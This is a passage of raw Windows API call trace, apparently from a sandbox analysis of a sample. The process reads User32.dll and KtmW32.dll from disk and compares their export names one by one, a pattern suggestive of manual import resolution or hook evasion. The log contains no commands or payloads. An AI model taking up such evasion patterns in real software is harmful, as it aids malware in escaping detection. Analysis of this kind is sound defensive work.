[0156.425] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0156.425] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0156.438] GetProcessHeap () returned 0x4d0000 [0156.438] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c45030 | out: hHeap=0x4d0000) returned 1 [0156.439] GetProcessHeap () returned 0x4d0000 [0156.439] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9150 [0156.439] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0156.439] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.439] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.439] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0156.439] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0156.440] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.440] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.440] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0156.440] GetProcessHeap () returned 0x4d0000 [0156.440] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1555b8) returned 0x400f040 [0156.444] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.444] ReadFile (in: hFile=0x17c, lpBuffer=0x400f040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x400f040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0156.563] CloseHandle (hObject=0x17c) returned 1 [0156.563] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0156.563] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0156.563] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0156.563] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0156.563] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0156.563] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0156.563] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0156.563] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0156.563] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0156.563] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0156.563] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0156.563] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0156.563] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0156.563] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0156.563] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0156.564] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0156.564] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0156.564] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0156.565] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0156.565] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0156.565] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0156.566] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0156.566] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0156.566] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0156.566] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0156.566] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0156.566] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0156.566] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0156.567] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0156.567] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0156.567] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0156.568] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0156.568] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0156.569] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0156.569] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0156.569] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0156.569] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0156.569] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0156.569] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0156.569] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0156.569] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0156.569] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0156.569] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0156.569] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0156.570] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0156.571] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0156.572] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0156.573] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0156.936] GetProcessHeap () returned 0x4d0000 [0156.936] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x400f040 | out: hHeap=0x4d0000) returned 1 [0156.942] GetProcessHeap () returned 0x4d0000 [0156.942] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9270 [0156.942] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0156.945] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.946] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0156.946] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0156.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.947] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0156.947] GetProcessHeap () returned 0x4d0000 [0156.947] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x5e00) returned 0x2c45030 [0156.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.947] ReadFile (in: hFile=0x17c, lpBuffer=0x2c45030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c45030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0156.948] CloseHandle (hObject=0x17c) returned 1 [0156.948] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0156.948] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0156.948] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0156.949] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0156.949] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 